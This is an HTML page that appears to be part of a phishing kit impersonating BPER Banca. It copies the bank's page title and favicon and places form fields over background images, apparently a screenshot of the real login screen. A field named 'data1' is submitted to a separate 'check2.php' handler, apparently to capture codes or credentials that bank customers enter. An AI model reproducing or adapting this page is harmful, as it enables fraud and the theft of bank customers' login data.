<html>
<head>

<style>
body {

background-color: 	#808080;
background-position: center; 
}
#box {
width:1335px;
height: 635px;
background-image:url('b.png');
 background-repeat:no-repeat;
 margin-left:-4;
 margin-right:auto;
}
input#u {
background: #FFF none repeat scroll 0% 0%;
border: 1px solid #D7D7D7;
font: 1em/1.25em Arial;
width: 381px;
height: 32px;
padding: 4px;
margin-top:236px;
margin-left:431px;
display: inline-block;
}
input#p {
background: #FFF none repeat scroll 0% 0%;
border: 1px solid #D7D7D7;
font: 1em/1.25em Arial;
width: 381px;
height: 62px;
padding: 4px;
margin-top:8px;
margin-left:481px;
display: inline-block;
}
input#p {
background: #FFF none repeat scroll 0% 0%;
border: 1px solid #D7D7D7;
font: 1em/1.25em Arial;
width: 381px;
height: 62px;
padding: 4px;
margin-top:8px;
margin-left:481px;
display: inline-block;
}
.myButton{
background:url('acce1.png') no-repeat;
cursor:pointer;
width:195px;
margin-left:880px;
margin-top:260px;
height: 50px;
border: none;
display: inline-block;



}
</style>
    <link rel="shortcut icon" href="https://www.bper.it/o/bper-theme/images/favicon.ico" />
</head>
		    <title>Conti, Carte, Mutui, Investimenti e Risparmio | BPER Banca

</title><body>
<div id="box">
<form action="check2.php" method="post">

<input type="text"  style="height:43px; width:210px; border: 1px solid red;  font: 0.8em/1.25em Arial ; position:absolute; left:617px; top:265px; size="4" MAXLENGTH="20" name="data1"   </td></tr>




<INPUT type="submit" class="myButton" value="">
</div>
</form>

</body>
</html>

